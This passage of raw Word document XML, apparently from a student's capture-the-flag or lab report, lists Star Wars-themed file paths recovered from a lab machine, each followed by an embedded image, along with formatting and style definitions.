        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_/home/death_star_admin/death-star_p"/>
      <w:bookmarkStart w:id="43" w:name="_Toc49875748"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/death_star_admin/death-star_plans/deathstar-cross-section.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="7C213669" w14:textId="7E993AD3" w:rsidR="007619E4" w:rsidRDefault="007619E4" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B86E0F7" wp14:editId="7AE3574E">
            <wp:extent cx="5403850" cy="6457950"/>
            <wp:effectExtent l="0" t="0" r="635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850" cy="645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580AE" w14:textId="6D7687F2" w:rsidR="007619E4" w:rsidRDefault="007619E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ACDD9B" w14:textId="5772BBA5" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_/home/death_star_admin/death-star_p_1"/>
      <w:bookmarkStart w:id="45" w:name="_Toc49875749"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>death_star_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/death-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>star_plans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/deathstar-summary.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="1C6DDD98" w14:textId="2BA6E8DE" w:rsidR="007619E4" w:rsidRDefault="004A3F8A" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047E9125" wp14:editId="7BD814E7">
            <wp:extent cx="5727700" cy="5461000"/>
            <wp:effectExtent l="0" t="0" r="635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46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033AB" w14:textId="3F0C978B" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00206945">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE56A2" w14:textId="78C443E7" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_/home/death_star_admin/death-star_p_2"/>
      <w:bookmarkStart w:id="47" w:name="_Toc49875750"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/death_star_admin/death-star_plans/deathstar-technical-specs-diagram.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="5DE32315" w14:textId="242F5AD9" w:rsidR="00206945" w:rsidRDefault="004A3F8A" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10CB300A" wp14:editId="3D59416A">
            <wp:extent cx="5461000" cy="6457950"/>
            <wp:effectExtent l="0" t="0" r="635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645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1E0FA" w14:textId="76D4F588" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E37BA" w14:textId="6DC5CEF8" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_/home/death_star_admin/death-star_p_3"/>
      <w:bookmarkStart w:id="49" w:name="_Toc49875751"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>death_star_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/death-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>star_plans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/deathstar-operations.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="1A1E012F" w14:textId="0903F127" w:rsidR="004A3F8A" w:rsidRPr="004A3F8A" w:rsidRDefault="00B7499F" w:rsidP="004A3F8A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6626C255" wp14:editId="5E1EF9B2">
            <wp:extent cx="5803900" cy="7187470"/>
            <wp:effectExtent l="0" t="0" r="635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520" cy="7195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E1C8B5" w14:textId="7D9C1EE0" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7CC139" w14:textId="7BE21237" w:rsidR="00851FD1" w:rsidRPr="004A3F8A" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_/home/death_star_admin/death-star_p_4"/>
      <w:bookmarkStart w:id="51" w:name="_Toc49875752"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>death_star_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/death-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>star_plans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/deathstar-crafts.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="777FD04C" w14:textId="5898814E" w:rsidR="00B27BE5" w:rsidRPr="00B27BE5" w:rsidRDefault="00B27BE5" w:rsidP="00B27BE5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A540A8" wp14:editId="76F9FE88">
            <wp:extent cx="5816600" cy="7215709"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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5656" cy="7239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22A22" w14:textId="6561C730" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D7BB4" w14:textId="375AE1B8" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_/home/darth_vader/i-love-my-death-s"/>
      <w:bookmarkStart w:id="53" w:name="_Toc49875753"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>darth_vader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/i-love-my-death-star.jpg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="7D123F6A" w14:textId="5A602E02" w:rsidR="00B27BE5" w:rsidRPr="00B27BE5" w:rsidRDefault="00B27BE5" w:rsidP="00B27BE5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35890CBD" wp14:editId="0F5894DB">
            <wp:extent cx="5651500" cy="6781800"/>
            <wp:effectExtent l="0" t="0" r="635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2743" cy="6783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2CBC8" w14:textId="33EB30DB" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF8C737" w14:textId="309FA53C" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_/opt/proftpd/share/locale/deathstar"/>
      <w:bookmarkStart w:id="55" w:name="_Toc49875754"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/locale/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>deathstarinfographic.pNg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C12F7D5" w14:textId="6DE11A43" w:rsidR="00B27BE5" w:rsidRPr="00B27BE5" w:rsidRDefault="00B27BE5" w:rsidP="00B27BE5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C6AEDF" wp14:editId="3CCBB4BA">
            <wp:extent cx="5727700" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="635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79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70646" w14:textId="4A6109B1" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF50E9" w14:textId="443DCC09" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_/home/general_veers/rebel-informati"/>
      <w:bookmarkStart w:id="57" w:name="_Toc49875755"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>general_veers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rebel-information/rebel-alliance-fleet-</w:t>
      </w:r>
      <w:r w:rsidR="00B27BE5">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.jpg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="3514C9E9" w14:textId="1F8ADD4F" w:rsidR="00B27BE5" w:rsidRPr="00B27BE5" w:rsidRDefault="00B27BE5" w:rsidP="00B27BE5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142BC0F6" wp14:editId="7C0B4F8A">
            <wp:extent cx="5645150" cy="8447001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5383" cy="8492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00E63" w14:textId="08D86EF1" w:rsidR="00206945" w:rsidRDefault="00206945" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F24408" w14:textId="71EFC239" w:rsidR="003B43FF" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_/home/general_veers/rebel-informati_1"/>
      <w:bookmarkStart w:id="59" w:name="_Toc49875756"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>general_veers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rebel-information/rebel-alliance-fleet-</w:t>
      </w:r>
      <w:r w:rsidR="00B27BE5">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.jpg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="75A30E35" w14:textId="6130AC52" w:rsidR="00206945" w:rsidRPr="00206945" w:rsidRDefault="00B27BE5" w:rsidP="00206945">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59302746" wp14:editId="130C7D54">
            <wp:extent cx="5727700" cy="3822700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="63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82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06945" w:rsidRPr="00206945">
      <w:headerReference w:type="default" r:id="rId42"/>
      <w:footerReference w:type="default" r:id="rId4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598E957" w14:textId="77777777" w:rsidR="002D6D1D" w:rsidRDefault="002D6D1D" w:rsidP="0049075E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65F30CA5" w14:textId="77777777" w:rsidR="002D6D1D" w:rsidRDefault="002D6D1D" w:rsidP="004907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395198142"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="0A3167A1" w14:textId="4254946B" w:rsidR="00F6289A" w:rsidRDefault="00F6289A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3B193800" w14:textId="77777777" w:rsidR="00F6289A" w:rsidRDefault="00F628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4E81ABF" w14:textId="77777777" w:rsidR="002D6D1D" w:rsidRDefault="002D6D1D" w:rsidP="0049075E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="694F06FC" w14:textId="77777777" w:rsidR="002D6D1D" w:rsidRDefault="002D6D1D" w:rsidP="004907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35C1B0" w14:textId="46CA5D77" w:rsidR="00F6289A" w:rsidRDefault="00330BDF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Mason Soroka-Gill (SOROM2)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6092F85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43904D3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105FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B3058A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E06241"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EBCDA2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314809"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8612F32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6A7FD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E963BC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75E"/>
    <w:rsid w:val="000010C0"/>
    <w:rsid w:val="00023819"/>
    <w:rsid w:val="00051730"/>
    <w:rsid w:val="00060520"/>
    <w:rsid w:val="00094A90"/>
    <w:rsid w:val="000A5419"/>
    <w:rsid w:val="000E60B2"/>
    <w:rsid w:val="00103461"/>
    <w:rsid w:val="00104729"/>
    <w:rsid w:val="00115970"/>
    <w:rsid w:val="00116A84"/>
    <w:rsid w:val="00122E68"/>
    <w:rsid w:val="00137370"/>
    <w:rsid w:val="00144F32"/>
    <w:rsid w:val="001550C8"/>
    <w:rsid w:val="001D465B"/>
    <w:rsid w:val="00206945"/>
    <w:rsid w:val="0021080C"/>
    <w:rsid w:val="00233020"/>
    <w:rsid w:val="00241C3C"/>
    <w:rsid w:val="002547AB"/>
    <w:rsid w:val="002578BE"/>
    <w:rsid w:val="0027091D"/>
    <w:rsid w:val="00280765"/>
    <w:rsid w:val="002D6D1D"/>
    <w:rsid w:val="002F08DB"/>
    <w:rsid w:val="00300AFA"/>
    <w:rsid w:val="0030300E"/>
    <w:rsid w:val="00322AF2"/>
    <w:rsid w:val="00330BDF"/>
    <w:rsid w:val="003339ED"/>
    <w:rsid w:val="003437D2"/>
    <w:rsid w:val="00391B6A"/>
    <w:rsid w:val="00392C7A"/>
    <w:rsid w:val="0039587E"/>
    <w:rsid w:val="003B43FF"/>
    <w:rsid w:val="003E737C"/>
    <w:rsid w:val="00402358"/>
    <w:rsid w:val="004076A9"/>
    <w:rsid w:val="004116CA"/>
    <w:rsid w:val="0049075E"/>
    <w:rsid w:val="004A3F68"/>
    <w:rsid w:val="004A3F8A"/>
    <w:rsid w:val="004C49C2"/>
    <w:rsid w:val="004F362C"/>
    <w:rsid w:val="0052608E"/>
    <w:rsid w:val="005C20DD"/>
    <w:rsid w:val="005F5AFF"/>
    <w:rsid w:val="00624BEE"/>
    <w:rsid w:val="006254C6"/>
    <w:rsid w:val="00642061"/>
    <w:rsid w:val="00673856"/>
    <w:rsid w:val="006B333A"/>
    <w:rsid w:val="006C151A"/>
    <w:rsid w:val="006C4B8B"/>
    <w:rsid w:val="006C554E"/>
    <w:rsid w:val="006E5841"/>
    <w:rsid w:val="007451F9"/>
    <w:rsid w:val="007619E4"/>
    <w:rsid w:val="00780ECA"/>
    <w:rsid w:val="0078156E"/>
    <w:rsid w:val="00784070"/>
    <w:rsid w:val="00793558"/>
    <w:rsid w:val="007A5172"/>
    <w:rsid w:val="007B453C"/>
    <w:rsid w:val="007B5973"/>
    <w:rsid w:val="007F35EF"/>
    <w:rsid w:val="00806BF0"/>
    <w:rsid w:val="00813087"/>
    <w:rsid w:val="00851FD1"/>
    <w:rsid w:val="00857ADD"/>
    <w:rsid w:val="00864DF2"/>
    <w:rsid w:val="008C24E1"/>
    <w:rsid w:val="008D36A2"/>
    <w:rsid w:val="0091400D"/>
    <w:rsid w:val="00915B54"/>
    <w:rsid w:val="00921957"/>
    <w:rsid w:val="00923E97"/>
    <w:rsid w:val="00930AEE"/>
    <w:rsid w:val="00940CC6"/>
    <w:rsid w:val="00951F3D"/>
    <w:rsid w:val="009901DD"/>
    <w:rsid w:val="00993E3E"/>
    <w:rsid w:val="009A23C1"/>
    <w:rsid w:val="009D5A42"/>
    <w:rsid w:val="009E1F19"/>
    <w:rsid w:val="00A0099F"/>
    <w:rsid w:val="00A02963"/>
    <w:rsid w:val="00A44266"/>
    <w:rsid w:val="00A5510B"/>
    <w:rsid w:val="00A61FAB"/>
    <w:rsid w:val="00A77FC3"/>
    <w:rsid w:val="00A81612"/>
    <w:rsid w:val="00A87C88"/>
    <w:rsid w:val="00AA20FA"/>
    <w:rsid w:val="00AE5525"/>
    <w:rsid w:val="00AF5782"/>
    <w:rsid w:val="00B26267"/>
    <w:rsid w:val="00B27BE5"/>
    <w:rsid w:val="00B27F01"/>
    <w:rsid w:val="00B5053C"/>
    <w:rsid w:val="00B6427A"/>
    <w:rsid w:val="00B678FE"/>
    <w:rsid w:val="00B7499F"/>
    <w:rsid w:val="00BA2A73"/>
    <w:rsid w:val="00BB143D"/>
    <w:rsid w:val="00BC6E8B"/>
    <w:rsid w:val="00BD55B3"/>
    <w:rsid w:val="00C21845"/>
    <w:rsid w:val="00C4296D"/>
    <w:rsid w:val="00C45F77"/>
    <w:rsid w:val="00C66923"/>
    <w:rsid w:val="00CB19DD"/>
    <w:rsid w:val="00CB502F"/>
    <w:rsid w:val="00CC0D04"/>
    <w:rsid w:val="00CD5238"/>
    <w:rsid w:val="00CF228F"/>
    <w:rsid w:val="00D43835"/>
    <w:rsid w:val="00D66EEA"/>
    <w:rsid w:val="00D72FFB"/>
    <w:rsid w:val="00D920CA"/>
    <w:rsid w:val="00DC6720"/>
    <w:rsid w:val="00E011D9"/>
    <w:rsid w:val="00E34EA3"/>
    <w:rsid w:val="00E36033"/>
    <w:rsid w:val="00E46727"/>
    <w:rsid w:val="00E63CDB"/>
    <w:rsid w:val="00E6595B"/>
    <w:rsid w:val="00E7001A"/>
    <w:rsid w:val="00E867D8"/>
    <w:rsid w:val="00EA1F79"/>
    <w:rsid w:val="00EB3F67"/>
    <w:rsid w:val="00EC4FB2"/>
    <w:rsid w:val="00EC79C0"/>
    <w:rsid w:val="00EF432B"/>
    <w:rsid w:val="00F2489E"/>
    <w:rsid w:val="00F3447E"/>
    <w:rsid w:val="00F41533"/>
    <w:rsid w:val="00F55621"/>
    <w:rsid w:val="00F5666E"/>
    <w:rsid w:val="00F6289A"/>
    <w:rsid w:val="00FB56FF"/>
    <w:rsid w:val="00FE70B0"/>
    <w:rsid w:val="00FE7E46"/>
    <w:rsid w:val="00FF1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FB581"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0341AA8C-BE23-4AC7-A1AE-C07A57D60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075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2FF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472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9D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3302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9075E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bahnschrift SemiBold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bahnschrift SemiBold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:spacing w:val="-10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49075E"/>
    <w:rPr>
      <w:rFonts w:ascii="Bahnschrift SemiBold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Bahnschrift SemiBold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"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4907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075E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004907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075E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004907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4907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rsid w:val="0049075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9075E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D72FFB"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr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D72FF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D72FF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72FF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72FF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B5053C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Monospace">
    <w:name w:val="Monospace"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00A61FAB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-NZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0010472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2489E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CB19DD"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CB19D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33020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4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115970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115970"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006254C6"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followed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547AB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C554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7C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NZ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7C88"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-N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15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65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7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23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16872">
          <w:marLeft w:val="-15"/>
          <w:marRight w:val="-15"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E1E4E8"/>
            <w:left w:val="single" w:sz="6" w:space="12" w:color="E1E4E8"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E1E4E8"/>
            <w:right w:val="single" w:sz="6" w:space="12" w:color="E1E4E8"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11642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13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14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1E4E8"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
